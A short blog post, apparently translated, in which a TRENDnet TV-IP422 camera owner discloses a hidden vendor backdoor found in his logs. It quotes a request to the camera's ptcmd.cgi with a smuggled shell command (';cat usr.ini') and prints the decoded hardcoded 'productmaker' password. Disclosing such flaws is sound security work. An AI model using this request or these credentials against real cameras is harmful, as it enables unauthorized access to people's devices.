How Trendnet tricked me the 2nd time

The first time it was in early 2012. I, the happy owner of the TV-IP422 camera, faced the problem of anonymous access to the camera , Trendnet “promptly” released a new firmware in which this bug is fixed.

Today discovered a strange camera behavior. I looked at the logs of nginx transmitting it and was surprised again.
In a heap of attempts to penetrate the phpmyadmin cameras, I see the following:

171.25.193.235 - productmaker [26 / Mar / 2015: 02: 22: 19 +0300] "GET /cgi/maker/ptcmd.cgi?cmd=%3E/dev/null;cat%20usr.ini HTTP / 1.1" 200 146 "-" "curl / 7.41.0"

This user was not created in the camera.
I try to open this URL without authorization - we get 401.
After logging in, I see the following:
')

admin = Basic YWRtaW46bXlfc3VwZXJwYXNz
maker = Basic cHJvZHVjdG1ha2VyOmZ0dnNiYW5uZWRjb2Rl

After some simple manipulations with Base64 we get:

admin = Basic admin: my_superpass
maker = Basic productmaker: ftvsbannedcode

Attempting to log in with the username of the productmaker on the camera itself (meaning the administrative part) did not succeed, but you can open the URL specified above. From this I can conclude that this is a deliberately left “tab” from the company. Thank them for that.

From this article, everyone draws his own conclusions for himself, but in my eyes the manufacturer has completely lost face.
Thanks for attention.

Articles on the topic: Infotect warns